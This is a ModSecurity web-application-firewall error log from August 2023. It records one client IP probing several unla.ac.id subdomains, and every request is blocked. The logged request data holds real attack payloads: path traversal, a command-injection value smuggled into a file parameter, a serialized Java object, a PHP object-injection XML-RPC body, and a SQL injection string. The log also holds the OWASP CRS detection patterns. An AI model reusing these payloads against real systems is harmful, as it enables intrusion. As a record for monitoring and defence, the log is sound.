[Tue Aug 29 11:32:42.493118 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARIwKMAAAAO"]
[Tue Aug 29 11:32:42.516069 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARNk58AAAAS"]
[Tue Aug 29 11:32:42.531359 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARMMd0AAAAR"]
[Tue Aug 29 11:32:46.406593 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAAN9sYYAAAAJ"]
[Tue Aug 29 11:32:46.407608 2023] [:error] [pid 1108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARUroUAAAAI"]
[Tue Aug 29 11:32:46.408044 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARNk6MAAAAS"]
[Tue Aug 29 11:32:46.424001 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARR22wAAAAF"]
[Tue Aug 29 11:32:46.426824 2023] [:error] [pid 1108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARUroYAAAAI"]
[Tue Aug 29 11:32:46.447494 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAAN9sYgAAAAJ"]
[Tue Aug 29 11:32:47.535410 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARTEJcAAAAG"]
[Tue Aug 29 11:32:47.536344 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARQ32QAAAAB"]
[Tue Aug 29 11:32:47.536679 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARNk6YAAAAS"]
[Tue Aug 29 11:32:47.537789 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAAN9sYoAAAAJ"]
[Tue Aug 29 11:32:47.543900 2023] [:error] [pid 1108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARUrogAAAAI"]
[Tue Aug 29 11:32:47.576147 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARR228AAAAF"]
[Tue Aug 29 11:32:47.594117 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARTEJgAAAAG"]
[Tue Aug 29 11:32:47.595756 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARQ32UAAAAB"]
[Tue Aug 29 11:32:47.598600 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAAN9sYsAAAAJ"]
[Tue Aug 29 11:32:47.602799 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARNk6cAAAAS"]
[Tue Aug 29 11:32:47.604270 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARIwLYAAAAO"]
[Tue Aug 29 11:32:47.633329 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARTEJkAAAAG"]
[Tue Aug 29 11:32:49.404954 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within XML: \\x0a\\x0a\\x0a\\x0a\\x0arO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\\x0agetUnsavedChanges\\x0arO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubm..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO108cCo-f0AAARA7b0AAAAA"]
[Tue Aug 29 11:32:49.432307 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARTEJwAAAAG"]
[Tue Aug 29 11:32:49.464228 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within XML: \\x0a\\x0a\\x0a\\x0a\\x0arO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\\x0agetUnsavedChanges\\x0arO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubm..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO108cCo-f0AAAPDoI8AAAAP"]
[Tue Aug 29 11:32:49.482901 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARMMekAAAAR"]
[Tue Aug 29 11:32:49.485752 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARR23YAAAAF"]
[Tue Aug 29 11:32:49.593019 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARNk6sAAAAS"]
[Tue Aug 29 11:32:49.605193 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARR23cAAAAF"]
[Tue Aug 29 11:32:49.693205 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARMMewAAAAR"]
[Tue Aug 29 11:32:51.455104 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAARMMe0AAAAR"]
